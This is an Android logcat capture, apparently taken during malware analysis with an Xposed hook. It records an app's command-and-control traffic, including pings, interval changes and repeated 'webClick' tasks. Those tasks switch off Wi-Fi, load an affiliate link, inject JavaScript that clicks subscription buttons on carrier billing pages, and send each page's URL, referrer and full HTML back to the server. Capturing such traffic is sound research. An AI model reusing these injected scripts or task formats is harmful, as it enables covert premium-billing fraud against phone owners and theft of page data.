11-19 17:13:24.175 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-19 17:13:24.179 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:12:23 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:12:23 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"410121\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:13:23 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 17:14:24.228 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:14:24.230 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:12:23 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:12:23 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"410121\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:13:23 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 17:14:24.717 I/Xposed (18830): [+] SERVER: []
11-19 17:14:24.755 I/Xposed (18830): [+] SERVER: [{"id":644187,"name":"OK"}]
11-19 17:15:24.260 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:15:24.925 I/Xposed (18830): [+] SERVER: []
11-19 17:16:24.256 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:16:24.826 I/Xposed (18830): [+] SERVER: []
11-19 17:17:24.305 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:17:24.911 I/Xposed (18830): [+] SERVER: []
11-19 17:18:24.316 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:18:24.946 I/Xposed (18830): [+] SERVER: [{"id":226966,"name":"interval","params":{"interval":1800}}]
11-19 17:18:25.001 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:18:24 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"226966\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 17:18:25.176 I/Xposed (18830): [+] SERVER: [{"id":196723,"name":"OK"}]
11-19 17:48:25.095 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:48:25.903 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a11b5d98e897","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":179652,"name":"interval","params":{"interval":60}}]
11-19 17:49:26.217 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:49:26 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 17:49:26.645 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:49:26 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"17:49:26 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 17:49:26.703 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:49:26 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"17:49:26 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:49:26 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"179652\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 17:50:26.759 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:49:26 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"17:49:26 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"17:49:26 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"179652\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 17:50:26.771 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:50:28.981 I/Xposed (18830): [+] SERVER: [{"id":669246,"name":"OK"}]
11-19 17:50:28.998 I/Xposed (18830): [+] SERVER: []
11-19 17:51:26.799 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:51:28.365 I/Xposed (18830): [+] SERVER: []
11-19 17:52:26.808 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:52:29.095 I/Xposed (18830): [+] SERVER: []
11-19 17:53:26.848 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:53:28.445 I/Xposed (18830): [+] SERVER: []
11-19 17:54:26.858 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:54:27.686 I/Xposed (18830): [+] SERVER: [{"id":480043,"name":"interval","params":{"interval":1800}}]
11-19 17:54:27.747 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:54:27 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"480043\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 17:54:28.165 I/Xposed (18830): [+] SERVER: [{"id":379620,"name":"OK"}]
11-19 18:24:51.269 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 18:24:51.792 I/Xposed (18830): [+] SERVER: [{"id":376809,"name":"interval","params":{"interval":1800}}]
11-19 18:24:51.861 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"18:24:51 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"376809\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 18:24:52.033 I/Xposed (18830): [+] SERVER: [{"id":402166,"name":"OK"}]
11-19 18:54:51.917 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 18:54:54.265 I/Xposed (18830): [+] SERVER: [{"id":183601,"name":"interval","params":{"interval":1800}}]
11-19 18:54:54.310 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"18:54:54 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"183601\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 18:54:54.716 I/Xposed (18830): [+] SERVER: [{"id":897969,"name":"OK"}]
11-19 19:24:54.308 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 19:24:54.993 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a11cc76b3f2b","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":127652,"name":"interval","params":{"interval":60}}]
11-19 19:24:55.183 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"19:24:55 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"19:24:55 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"127652\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 19:25:55.162 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"19:24:55 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"19:24:55 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"127652\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 19:25:55.198 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-19 19:27:24.073 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 19:27:24.088 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"19:24:55 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"19:24:55 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"127652\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"19:25:55 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 19:27:24.739 I/Xposed (18830): [+] SERVER: []
11-19 19:27:24.757 I/Xposed (18830): [+] SERVER: [{"id":576079,"name":"OK"}]
11-19 19:28:24.156 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 19:28:24.956 I/Xposed (18830): [+] SERVER: []
11-19 19:29:24.099 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 19:29:24.865 I/Xposed (18830): [+] SERVER: []
11-19 19:30:24.173 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 19:30:24.726 I/Xposed (18830): [+] SERVER: [{"id":354071,"name":"interval","params":{"interval":1800}}]
11-19 19:30:24.782 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"19:30:24 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"354071\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 19:30:24.953 I/Xposed (18830): [+] SERVER: [{"id":636839,"name":"OK"}]
11-19 20:01:17.253 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 20:01:18.156 I/Xposed (18830): [+] SERVER: [{"id":820363,"name":"interval","params":{"interval":1800}}]
11-19 20:01:18.198 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"20:01:18 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"820363\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 20:01:18.386 I/Xposed (18830): [+] SERVER: [{"id":333301,"name":"OK"}]
11-19 20:31:18.294 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 20:31:18.866 I/Xposed (18830): [+] SERVER: [{"id":134341,"name":"interval","params":{"interval":1800}}]
11-19 20:31:18.908 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"20:31:18 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"134341\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 20:31:19.085 I/Xposed (18830): [+] SERVER: [{"id":718679,"name":"OK"}]
11-19 21:04:53.961 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 21:05:30.867 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a11e40a7aa16","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":692466,"name":"interval","params":{"interval":60}}]
11-19 21:05:31.016 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"21:05:30 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 21:06:31.314 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-19 21:06:31.319 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"21:05:30 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"21:05:31 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"692466\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"21:06:31 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 21:07:31.326 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 21:07:31.337 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"21:05:30 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"21:05:31 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"692466\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"21:06:31 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 21:07:33.729 I/Xposed (18830): [+] SERVER: [{"id":607493,"name":"OK"}]
11-19 21:07:33.749 I/Xposed (18830): [+] SERVER: []
11-19 21:08:31.326 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 21:08:33.625 I/Xposed (18830): [+] SERVER: []
11-19 21:09:31.337 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 21:09:33.215 I/Xposed (18830): [+] SERVER: []
11-19 21:10:31.382 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 21:10:32.187 I/Xposed (18830): [+] SERVER: []
11-19 21:11:31.384 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 21:11:32.126 I/Xposed (18830): [+] SERVER: [{"id":433020,"name":"interval","params":{"interval":1800}}]
11-19 21:11:32.182 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"21:11:32 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"433020\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 21:11:32.352 I/Xposed (18830): [+] SERVER: [{"id":432617,"name":"OK"}]
11-19 21:42:01.605 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 21:42:02.454 I/Xposed (18830): [+] SERVER: [{"id":291373,"name":"interval","params":{"interval":1800}}]
11-19 21:42:02.489 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"21:42:02 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"291373\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 21:42:02.663 I/Xposed (18830): [+] SERVER: [{"id":728443,"name":"OK"}]
11-19 22:14:12.727 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 22:14:13.275 I/Xposed (18830): [+] SERVER: [{"id":454568,"name":"interval","params":{"interval":1800}}]
11-19 22:14:13.337 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"22:14:13 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"454568\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 22:14:13.505 I/Xposed (18830): [+] SERVER: [{"id":597641,"name":"OK"}]
11-19 22:44:13.433 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 22:44:15.520 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a11fb2f1336b","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":578956,"name":"interval","params":{"interval":60}}]
11-19 22:44:15.604 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"22:44:15 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 22:44:15.709 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"22:44:15 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"22:44:15 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"578956\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
